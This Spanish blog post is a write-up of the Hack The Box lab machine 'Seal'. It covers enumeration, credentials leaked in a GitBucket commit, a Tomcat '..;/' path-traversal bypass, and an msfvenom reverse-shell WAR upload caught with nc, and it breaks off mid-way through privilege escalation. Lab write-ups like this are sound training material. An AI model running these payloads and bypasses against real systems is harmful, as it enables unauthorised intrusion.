<!DOCTYPE html>
<html lang="es"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Maquina Retirada Seal de Hack The Box (Necesario VIP) | Pirrandi Blog</title>
<meta name="generator" content="Jekyll v3.9.3" />
<meta property="og:title" content="Maquina Retirada Seal de Hack The Box (Necesario VIP)" />
<meta name="author" content="Pirrandi" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada SEAL" />
<meta property="og:description" content="En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada SEAL" />
<link rel="canonical" href="http://localhost:4000/2021/11/14/Seal.html" />
<meta property="og:url" content="http://localhost:4000/2021/11/14/Seal.html" />
<meta property="og:site_name" content="Pirrandi Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-11-14T00:00:00-03:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Maquina Retirada Seal de Hack The Box (Necesario VIP)" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Pirrandi"},"dateModified":"2021-11-14T00:00:00-03:00","datePublished":"2021-11-14T00:00:00-03:00","description":"En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada SEAL","headline":"Maquina Retirada Seal de Hack The Box (Necesario VIP)","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2021/11/14/Seal.html"},"url":"http://localhost:4000/2021/11/14/Seal.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" /><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Pirrandi Blog" /></head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">Pirrandi Blog<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        <a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a>
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
  <div class="author-box">
    
    
        <img src="" class="author-avatar" alt="Avatar" />
    
Este es mi blog personal sobre Conceptos Hacking Etico // HTB // TryHackMe // Resumenes de Hacking // Herramientas para distintas tareas.

</div>


<div class="post">
  <h1 class="post-title">Maquina Retirada Seal de Hack The Box (Necesario VIP)</h1>
  
  <div class="post-tags">
     
      <a class="tag" href="/tag/HTB,/">HTB,</a>
      
      <a class="tag" href="/tag/Tomcat,/">Tomcat,</a>
      
      <a class="tag" href="/tag/Gitbucket,/">Gitbucket,</a>
      
      <a class="tag" href="/tag/msfvenom,/">msfvenom,</a>
      
      <a class="tag" href="/tag/Web/">Web</a>
      
      <a class="tag" href="/tag/Hacking,/">Hacking,</a>
      
      <a class="tag" href="/tag/Maquinas/">Maquinas</a>
      
      <a class="tag" href="/tag/Retiradas,/">Retiradas,</a>
      
      <a class="tag" href="/tag/Writeup,/">Writeup,</a>
      
  </div>
  
  <div class="post-date">Published on 14 Nov 2021</div>
  
  <noscript>
    <div class="post-description">En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada SEAL</div>
  </noscript>
  <div id="animated-post-description" class="post-description" style="display: none;"></div>
  
  <h1 id="seal--hack-the-box">Seal ~ Hack The Box</h1>

<p>Realizamos el Primer escaneo con Nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="s2">$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.10.250       "</span>
</code></pre></div></div>
<p>Procedemos con el siguiente escaneo de Nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Nmap 7.91 scan initiated Tue Jul 20 17:30:18 2021 as: nmap -sC -sV -p22,443,8080 -oN target 10.10.10.250</span>
Nmap scan report <span class="k">for </span>10.10.10.250
Host is up <span class="o">(</span>0.053s latency<span class="o">)</span><span class="nb">.</span>

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 <span class="o">(</span>RSA<span class="o">)</span>
|   256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 <span class="o">(</span>ED25519<span class="o">)</span>
443/tcp  open  ssl/http   nginx 1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-server-header: nginx/1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Seal Market
| ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>seal.htb/organizationName<span class="o">=</span>Seal Pvt Ltd/stateOrProvinceName<span class="o">=</span>London/countryName<span class="o">=</span>UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after:  2022-05-05T10:24:03
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Tue, 20 Jul 2021 15:30:27 GMT
|     Set-Cookie: <span class="nv">JSESSIONID</span><span class="o">=</span>node01kw6b4gn2hivrrjdvhvjra7472.node0<span class="p">;</span> <span class="nv">Path</span><span class="o">=</span>/<span class="p">;</span> HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html<span class="p">;</span><span class="nv">charset</span><span class="o">=</span>utf-8
|     Content-Length: 0
|   GetRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Tue, 20 Jul 2021 15:30:26 GMT
|     Set-Cookie: <span class="nv">JSESSIONID</span><span class="o">=</span>node0p0sfk1cil6371sqzhr3m9qphz0.node0<span class="p">;</span> <span class="nv">Path</span><span class="o">=</span>/<span class="p">;</span> HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html<span class="p">;</span><span class="nv">charset</span><span class="o">=</span>utf-8
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Tue, 20 Jul 2021 15:30:27 GMT
|     Set-Cookie: <span class="nv">JSESSIONID</span><span class="o">=</span>node01wl1o9iqo05a51uao83w56od331.node0<span class="p">;</span> <span class="nv">Path</span><span class="o">=</span>/<span class="p">;</span> HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html<span class="p">;</span><span class="nv">charset</span><span class="o">=</span>utf-8
|     Allow: GET,HEAD,POST,OPTIONS
|     Content-Length: 0
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character <span class="nv">OTEXT</span><span class="o">=</span>0x80
|     Content-Type: text/html<span class="p">;</span><span class="nv">charset</span><span class="o">=</span>iso-8859-1
|     Content-Length: 71
|     Connection: close
|     &lt;h1&gt;Bad Message 400&lt;/h1&gt;&lt;pre&gt;reason: Illegal character <span class="nv">OTEXT</span><span class="o">=</span>0x80&lt;/pre&gt;
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html<span class="p">;</span><span class="nv">charset</span><span class="o">=</span>iso-8859-1
|     Content-Length: 58
|     Connection: close
|     &lt;h1&gt;Bad Message 505&lt;/h1&gt;&lt;pre&gt;reason: Unknown Version&lt;/pre&gt;
|   Socks4: 
|     HTTP/1.1 400 Illegal character <span class="nv">CNTL</span><span class="o">=</span>0x4
|     Content-Type: text/html<span class="p">;</span><span class="nv">charset</span><span class="o">=</span>iso-8859-1
|     Content-Length: 69
|     Connection: close
|     &lt;h1&gt;Bad Message 400&lt;/h1&gt;&lt;pre&gt;reason: Illegal character <span class="nv">CNTL</span><span class="o">=</span>0x4&lt;/pre&gt;
|   Socks5: 
|     HTTP/1.1 400 Illegal character <span class="nv">CNTL</span><span class="o">=</span>0x5
|     Content-Type: text/html<span class="p">;</span><span class="nv">charset</span><span class="o">=</span>iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    &lt;h1&gt;Bad Message 400&lt;/h1&gt;&lt;pre&gt;reason: Illegal character <span class="nv">CNTL</span><span class="o">=</span>0x5&lt;/pre&gt;
| http-auth: 
| HTTP/1.1 401 Unauthorized<span class="se">\x</span>0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: Site doesn<span class="s1">'t have a title (text/html;charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.91%I=7%D=7/20%Time=60F6EC11%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,F4,"HTTP/1\.1\x20401\x20Unauthorized\r\nDate:\x20Tue,\x2020\x2
SF:0Jul\x202021\x2015:30:26\x20GMT\r\nSet-Cookie:\x20JSESSIONID=node0p0sfk
SF:1cil6371sqzhr3m9qphz0\.node0;\x20Path=/;\x20HttpOnly\r\nExpires:\x20Thu
SF:,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nContent-Type:\x20text/html
SF:;charset=utf-8\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,109,"HTT
SF:P/1\.1\x20200\x20OK\r\nDate:\x20Tue,\x2020\x20Jul\x202021\x2015:30:27\x
SF:20GMT\r\nSet-Cookie:\x20JSESSIONID=node01wl1o9iqo05a51uao83w56od331\.no
SF:de0;\x20Path=/;\x20HttpOnly\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\x2
SF:000:00:00\x20GMT\r\nContent-Type:\x20text/html;charset=utf-8\r\nAllow:\
SF:x20GET,HEAD,POST,OPTIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPReques
SF:t,AD,"HTTP/1\.1\x20505\x20Unknown\x20Version\r\nContent-Type:\x20text/h
SF:tml;charset=iso-8859-1\r\nContent-Length:\x2058\r\nConnection:\x20close
SF:\r\n\r\n&lt;h1&gt;Bad\x20Message\x20505&lt;/h1&gt;&lt;pre&gt;reason:\x20Unknown\x20Versio
SF:n&lt;/pre&gt;")%r(FourOhFourRequest,F4,"HTTP/1\.1\x20401\x20Unauthorized\r\nD
SF:ate:\x20Tue,\x2020\x20Jul\x202021\x2015:30:27\x20GMT\r\nSet-Cookie:\x20
SF:JSESSIONID=node01kw6b4gn2hivrrjdvhvjra7472\.node0;\x20Path=/;\x20HttpOn
SF:ly\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nConte
SF:nt-Type:\x20text/html;charset=utf-8\r\nContent-Length:\x200\r\n\r\n")%r
SF:(Socks5,C3,"HTTP/1\.1\x20400\x20Illegal\x20character\x20CNTL=0x5\r\nCon
SF:tent-Type:\x20text/html;charset=iso-8859-1\r\nContent-Length:\x2069\r\n
SF:Connection:\x20close\r\n\r\n&lt;h1&gt;Bad\x20Message\x20400&lt;/h1&gt;&lt;pre&gt;reason:\
SF:x20Illegal\x20character\x20CNTL=0x5&lt;/pre&gt;")%r(Socks4,C3,"HTTP/1\.1\x204
SF:00\x20Illegal\x20character\x20CNTL=0x4\r\nContent-Type:\x20text/html;ch
SF:arset=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\r\n\r
SF:\n&lt;h1&gt;Bad\x20Message\x20400&lt;/h1&gt;&lt;pre&gt;reason:\x20Illegal\x20character\x2
SF:0CNTL=0x4&lt;/pre&gt;")%r(RPCCheck,C7,"HTTP/1\.1\x20400\x20Illegal\x20charact
SF:er\x20OTEXT=0x80\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nCo
SF:ntent-Length:\x2071\r\nConnection:\x20close\r\n\r\n&lt;h1&gt;Bad\x20Message\x
SF:20400&lt;/h1&gt;&lt;pre&gt;reason:\x20Illegal\x20character\x20OTEXT=0x80&lt;/pre&gt;");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></code></pre></div></div>

<p>Identificamos un dominio que introducimos al fichero <code class="language-plaintext highlighter-rouge">/etc/hosts</code> –&gt; <code class="language-plaintext highlighter-rouge">seal.htb</code>
Procedemos a fuzzear la web en buscar de directorios interesantes</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt https://seal.htb/FUZZ                                                                               2 ⨯ 1 ⚙</span>
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz<span class="s1">'s documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://seal.htb/FUZZ
Total requests: 207630

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                           
=====================================================================

000000003:   302        0 L      0 W        0 Ch        "images"                                                                                                                                          
000000001:   200        518 L    1140 W     19737 Ch    "https://seal.htb/"                                                                                                                               
000000243:   302        0 L      0 W        0 Ch        "admin"                                                                                                                                           
000000530:   302        0 L      0 W        0 Ch        "css"                                                                                                                                             
000000426:   302        0 L      0 W        0 Ch        "icon"                                                                                                                                            
000000907:   302        0 L      0 W        0 Ch        "js"                                                                                                                                              
000004562:   302        0 L      0 W        0 Ch        "manager"
</span></code></pre></div></div>
<p>Vemos que tenemos bastantes directorios chequeamos manualmente para ver los recursos, y encontramos un <code class="language-plaintext highlighter-rouge">403 Forbidden</code>
Procedemos a seguir FUzzeando por el directorio encontrado <code class="language-plaintext highlighter-rouge">manager</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt https://seal.htb/manager/FUZZ                                                                     130 ⨯ 1 ⚙</span>
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz<span class="s1">'s documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://seal.htb/manager/FUZZ
Total requests: 207630

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                           
=====================================================================

000000001:   302        0 L      0 W        0 Ch        "https://seal.htb/manager/"                                                                                                                       
000000003:   302        0 L      0 W        0 Ch        "images"                                                                                                                                          
000000079:   403        7 L      10 W       162 Ch      "html"                                                                                                                                            
000000324:   401        63 L     291 W      2499 Ch     "text"                                                                                                                                            
000000733:   401        63 L     291 W      2499 Ch     "status"
</span></code></pre></div></div>
<p>Comprobando los subdirectorios para el recurso <code class="language-plaintext highlighter-rouge">manager</code> encontramos un panel login en la ruta <code class="language-plaintext highlighter-rouge">/manager/status</code>
Probamos credenciales por defecto y vemos que no optenemos acceso.
Encontramos la version del Tomcat en la siguiente ruta <code class="language-plaintext highlighter-rouge">https://10.10.10.250/admin/</code>
Procedemos a enumerar el servicio <code class="language-plaintext highlighter-rouge">http-proxy</code> por el puerto <code class="language-plaintext highlighter-rouge">8080</code> y nos encontramos otro panel de Login donde nos podemos Registrar, nos registramos y accedemos</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://seal.htb:8080/signin<span class="p">;</span><span class="nv">jsessionid</span><span class="o">=</span>node01ihai0hk4uf3tuf205qlxevix0.node0?redirect<span class="o">=</span>%2F
</code></pre></div></div>
<p>Procedemos a Registrarnos y al entrar vemos que estamos ante un <code class="language-plaintext highlighter-rouge">GitBucket</code>, se parece mucho a <code class="language-plaintext highlighter-rouge">Github</code> encuanto a estructuras de archivos.
Procedemos a Apuntar a la ruta del proyecto de <code class="language-plaintext highlighter-rouge">root/seal_market</code>, encontramos tres directorios:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="s2">"* app *"</span>
<span class="s2">"* nginx *"</span>
<span class="s2">"* tomcat *"</span>
<span class="s2">" Readme.md "</span>
</code></pre></div></div>
<p>Procedemos a meternos en los directorios <code class="language-plaintext highlighter-rouge">app, nginx, tomcat</code> como vemos que podemos visualizar los recursos de los CMS pensamos que podriamos encontrar algun archivo interesante
con credenciales en texto claro. Procedemos a buscar por los ultimos commits para cada recurso
Damos con el <code class="language-plaintext highlighter-rouge">Last Commit</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tomcat/tomcat-users.xml
	
		  &lt;user <span class="nv">username</span><span class="o">=</span><span class="s2">"tomcat"</span> <span class="nv">password</span><span class="o">=</span><span class="s2">"&lt;must-be-changed&gt;"</span> <span class="nv">roles</span><span class="o">=</span><span class="s2">"tomcat"</span>/&gt;
		  &lt;user <span class="nv">username</span><span class="o">=</span><span class="s2">"both"</span> <span class="nv">password</span><span class="o">=</span><span class="s2">"&lt;must-be-changed&gt;"</span> <span class="nv">roles</span><span class="o">=</span><span class="s2">"tomcat,role1"</span>/&gt;
		  &lt;user <span class="nv">username</span><span class="o">=</span><span class="s2">"role1"</span> <span class="nv">password</span><span class="o">=</span><span class="s2">"&lt;must-be-changed&gt;"</span> <span class="nv">roles</span><span class="o">=</span><span class="s2">"role1"</span>/&gt;
		<span class="nt">--</span><span class="o">&gt;</span>
		&lt;user <span class="nv">username</span><span class="o">=</span><span class="s2">"tomcat"</span> <span class="nv">password</span><span class="o">=</span><span class="s2">"42MrHBf*z8{Z%"</span> <span class="nv">roles</span><span class="o">=</span><span class="s2">"manager-gui,admin-gui"</span>/&gt;
		&lt;/tomcat-users&gt;
</code></pre></div></div>
<p>Encontramos este archivo con la password y user para el <code class="language-plaintext highlighter-rouge">tomcat</code>
Procedemos a intentar loggearnos en el otro login en la direccion <code class="language-plaintext highlighter-rouge">https://seal.htb/manager/status</code></p>

<p>Conseguimos acceso con las Credenciales obtenidas, procedemos a intentar listar las aplicaciones del Tomcat y vemos que recibimos un <code class="language-plaintext highlighter-rouge">403 Forbiden</code>
Buscando info sobre como podemos hacer para listar la <code class="language-plaintext highlighter-rouge">Apliccaciones del Tomcat disponibles</code> encontramos este recurso que nos indica una posible forma de hacerlo.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/
</code></pre></div></div>
<p>La forma</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://10.10.10.250/manager/status/..<span class="p">;</span>/html/
</code></pre></div></div>
<p>Ahora para ganar acceso a la maquina victima, en los CMS Tomcat podemos subir un archivo <code class="language-plaintext highlighter-rouge">.war</code> <code class="language-plaintext highlighter-rouge">malicioso</code>.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.16.7 lport=443 -f war &gt; setenso.war                                                                                                                35 ⨯ 1 ⚙</span>
Payload size: 1083 bytes
Final size of war file: 1083 bytes
</code></pre></div></div>
<p>Una vez tenemos el archivo creado, vamos a intentar subirlo. Nos vamos a donde pone <code class="language-plaintext highlighter-rouge">WAR file to deploy</code> y procedemos a intentar subir el archivo</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://10.10.10.250/manager/html/upload<span class="p">;</span><span class="nv">jsessionid</span><span class="o">=</span>30996A6436CBB5E16EE0296121D0CCA8?org.apache.catalina.filters.CSRF_NONCE<span class="o">=</span>B68A395DF24E8D8C6E14811F6E50C638
403 FORBIDDEN
</code></pre></div></div>
<p>Vale vemos que tenemos un problema porque la url como veiamos no nos funciona correctamente <code class="language-plaintext highlighter-rouge">/manager/html/upload</code> en esta seccion. Nos abrimos burpsuite para cambiar esta parte
a <code class="language-plaintext highlighter-rouge">manager/status/..;/html/upload</code> y subir el archivo correctamente.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /manager/status/..<span class="p">;</span>/html/upload<span class="p">;</span><span class="nv">jsessionid</span><span class="o">=</span>30996A6436CBB5E16EE0296121D0CCA8?org.apache.catalina.filters.CSRF_NONCE<span class="o">=</span>B68A395DF24E8D8C6E14811F6E50C638 HTTP/1.1
</code></pre></div></div>
<p>Lo conseguimos subir correctamente. Procedo a ponerme una session con <code class="language-plaintext highlighter-rouge">nc -vlnp 443</code> a la escucha para recibir la conexion entrante.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># nc -vlnp 443                                                                                                                                                                                               2 ⚙</span>
listening on <span class="o">[</span>any] 443 ...
connect to <span class="o">[</span>10.10.16.7] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.250] 56870
<span class="nb">whoami
</span>tomcat
</code></pre></div></div>
<p>Procedemos a realizar el tratamiento de la shell como siempre.
Procedemos a enumerar el sistema en busca de la flag.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tomcat@seal:/home/luis<span class="nv">$ </span><span class="nb">cat </span>user.txt 
<span class="nb">cat</span>: user.txt: Permission denied
</code></pre></div></div>
<p>Vemos que tenemos que saltar del user tomcat al user Luis.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tomcat@seal:/home/luis<span class="nv">$ </span>find / <span class="nt">-group</span> luis <span class="nt">-type</span> f 2&gt;/dev/null
/opt/backups/archives/backup-2021-11-14-10:56:33.gz
/opt/backups/archives/backup-2021-11-14-10:55:33.gz
/opt/backups/playbook/run.ym
</code></pre></div></div>
<p>Enumerando encontramos en la ruta <code class="language-plaintext highlighter-rouge">/opt/backups/</code> archivos que pertenecen al user Luis, se pone interesante.
vemos que parece que hay una tarea CRON ejecutando cada cierto tiempo backups en el directorio de antes. 
Por eso mismo y para confirmarlo subimos el <code class="language-plaintext highlighter-rouge">pspy32s</code> para verficar si efectivamente tenemos una tarea Cron ejecutandose.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>2021/11/14 11:01:01 CMD: <span class="nv">UID</span><span class="o">=</span>0    <span class="nv">PID</span><span class="o">=</span>16861  | /usr/sbin/CRON <span class="nt">-f</span> 
2021/11/14 11:01:01 CMD: <span class="nv">UID</span><span class="o">=</span>0    <span class="nv">PID</span><span class="o">=</span>16862  | /bin/sh <span class="nt">-c</span> <span class="nb">sleep </span>30 <span class="o">&amp;&amp;</span> <span class="nb">sudo</span> <span class="nt">-u</span> luis /usr/bin/ansible-playbook /opt/backups/playbook/run.yml 
2021/11/14 11:01:01 CMD: <span class="nv">UID</span><span class="o">=</span>0    <span class="nv">PID</span><span class="o">=</span>16863  | <span class="nb">sleep </span>30 
2021/11/14 11:01:31 CMD: <span class="nv">UID</span><span class="o">=</span>0    <span class="nv">PID</span><span class="o">=</span>16876  | <span class="nb">sudo</span> <span class="nt">-u</span> luis /usr/bin/ansible-playbook /opt/backups/playbook/run.yml
</code></pre></div></div>
<p>Procedemos a investigar esos ficheros de backups</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>file backup-2021-11-14-11<span class="se">\:</span>05<span class="se">\:</span>32.gz 
backup-2021-11-14-11:05:32.gz: <span class="nb">gzip </span>compressed data, was <span class="s2">"backup-2021-11-14-11:05:32"</span>, last modified: Sun Nov 14 11:05:33 2021, max compression, original size modulo 2^32 1617920
</code></pre></div></div>
<p>Procedemos a apuntar al script que se ejecuta para realizar las tareas de Backups</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tomcat@seal:/opt/backups/archives<span class="nv">$ </span><span class="nb">cat</span> /usr/bin/ansible-playbook 
<span class="c">#!/usr/bin/env python3</span>
<span class="c"># -*- coding: utf-8 -*-</span>
<span class="c"># (c) 2012, Michael DeHaan &lt;michael.dehaan@gmail.com&gt;</span>
<span class="c">#</span>
<span class="c"># This file is part of Ansible</span>
<span class="c">#</span>
<span class="c"># Ansible is free software: you can redistribute it and/or modify</span>
<span class="c"># it under the terms of the GNU General Public License as published by</span>
<span class="c"># the Free Software Foundation, either version 3 of the License, or</span>
<span class="c"># (at your option) any later version.</span>
<span class="c">#</span>
<span class="c"># Ansible is distributed in the hope that it will be useful,</span>
<span class="c"># but WITHOUT ANY WARRANTY; without even the implied warranty of</span>
<span class="c"># MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the</span>
<span class="c"># GNU General Public License for more details.</span>
<span class="c">#</span>
<span class="c"># You should have received a copy of the GNU General Public License</span>
<span class="c"># along with Ansible.  If not, see &lt;http://www.gnu.org/licenses/&gt;.</span>

<span class="c"># PYTHON_ARGCOMPLETE_OK</span>

from __future__ import <span class="o">(</span>absolute_import, division, print_function<span class="o">)</span>
__metaclass__ <span class="o">=</span> <span class="nb">type

</span>__requires__ <span class="o">=</span> <span class="o">[</span><span class="s1">'ansible'</span><span class="o">]</span>


import errno
import os
import shutil
import sys
import traceback

from ansible import context
from ansible.errors import AnsibleError, AnsibleOptionsError, AnsibleParserError
from ansible.module_utils._text import to_text


<span class="c"># Used for determining if the system is running a new enough python version</span>
<span class="c"># and should only restrict on our documented minimum versions</span>
_PY3_MIN <span class="o">=</span> sys.version_info[:2] <span class="o">&gt;=</span> <span class="o">(</span>3, 5<span class="o">)</span>
_PY2_MIN <span class="o">=</span> <span class="o">(</span>2, 6<span class="o">)</span> &lt;<span class="o">=</span> sys.version_info[:2] &lt; <span class="o">(</span>3,<span class="o">)</span>
_PY_MIN <span class="o">=</span> _PY3_MIN or _PY2_MIN
<span class="k">if </span>not _PY_MIN:
    raise SystemExit<span class="o">(</span><span class="s1">'ERROR: Ansible requires a minimum of Python2 version 2.6 or Python3 version 3.5. Current version: %s'</span> % <span class="s1">''</span>.join<span class="o">(</span>sys.version.splitlines<span class="o">()))</span>


class LastResort<span class="o">(</span>object<span class="o">)</span>:
    <span class="c"># OUTPUT OF LAST RESORT</span>
    def display<span class="o">(</span>self, msg, <span class="nv">log_only</span><span class="o">=</span>None<span class="o">)</span>:
        print<span class="o">(</span>msg, <span class="nv">file</span><span class="o">=</span>sys.stderr<span class="o">)</span>

    def error<span class="o">(</span>self, msg, <span class="nv">wrap_text</span><span class="o">=</span>None<span class="o">)</span>:
        print<span class="o">(</span>msg, <span class="nv">file</span><span class="o">=</span>sys.stderr<span class="o">)</span>


<span class="k">if </span>__name__ <span class="o">==</span> <span class="s1">'__main__'</span>:

    display <span class="o">=</span> LastResort<span class="o">()</span>

    try:  <span class="c"># bad ANSIBLE_CONFIG or config options can force ugly stacktrace</span>
        import ansible.constants as C
        from ansible.utils.display import Display
    except AnsibleOptionsError as e:
        display.error<span class="o">(</span>to_text<span class="o">(</span>e<span class="o">)</span>, <span class="nv">wrap_text</span><span class="o">=</span>False<span class="o">)</span>
        sys.exit<span class="o">(</span>5<span class="o">)</span>

    cli <span class="o">=</span> None
    me <span class="o">=</span> os.path.basename<span class="o">(</span>sys.argv[0]<span class="o">)</span>

    try:
        display <span class="o">=</span> Display<span class="o">()</span>
        display.debug<span class="o">(</span><span class="s2">"starting run"</span><span class="o">)</span>

        sub <span class="o">=</span> None
        target <span class="o">=</span> me.split<span class="o">(</span><span class="s1">'-'</span><span class="o">)</span>
        <span class="k">if </span>target[-1][0].isdigit<span class="o">()</span>:
            <span class="c"># Remove any version or python version info as downstreams</span>
            <span class="c"># sometimes add that</span>
            target <span class="o">=</span> target[:-1]

        <span class="k">if </span>len<span class="o">(</span>target<span class="o">)</span> <span class="o">&gt;</span> 1:
            sub <span class="o">=</span> target[1]
            myclass <span class="o">=</span> <span class="s2">"%sCLI"</span> % sub.capitalize<span class="o">()</span>
        <span class="k">elif </span>target[0] <span class="o">==</span> <span class="s1">'ansible'</span>:
            sub <span class="o">=</span> <span class="s1">'adhoc'</span>
            myclass <span class="o">=</span> <span class="s1">'AdHocCLI'</span>
        <span class="k">else</span>:
            raise AnsibleError<span class="o">(</span><span class="s2">"Unknown Ansible alias: %s"</span> % me<span class="o">)</span>

        try:
            mycli <span class="o">=</span> getattr<span class="o">(</span>__import__<span class="o">(</span><span class="s2">"ansible.cli.%s"</span> % sub, <span class="nv">fromlist</span><span class="o">=[</span>myclass]<span class="o">)</span>, myclass<span class="o">)</span>
        except ImportError as e:
            <span class="c"># ImportError members have changed in py3</span>
            <span class="k">if</span> <span class="s1">'msg'</span> <span class="k">in </span><span class="nb">dir</span><span class="o">(</span>e<span class="o">)</span>:
                msg <span class="o">=</span> e.msg
            <span class="k">else</span>:
                msg <span class="o">=</span> e.message
            <span class="k">if </span>msg.endswith<span class="o">(</span><span class="s1">' %s'</span> % sub<span class="o">)</span>:
                raise AnsibleError<span class="o">(</span><span class="s2">"Ansible sub-program not implemented: %s"</span> % me<span class="o">)</span>
            <span class="k">else</span>:
                raise

        b_ansible_dir <span class="o">=</span> os.path.expanduser<span class="o">(</span>os.path.expandvars<span class="o">(</span>b<span class="s2">"~/.ansible"</span><span class="o">))</span>
        try:
            os.mkdir<span class="o">(</span>b_ansible_dir, 0o700<span class="o">)</span>
        except OSError as exc:
            <span class="k">if </span>exc.errno <span class="o">!=</span> errno.EEXIST:
                display.warning<span class="o">(</span><span class="s2">"Failed to create the directory '%s': %s"</span>
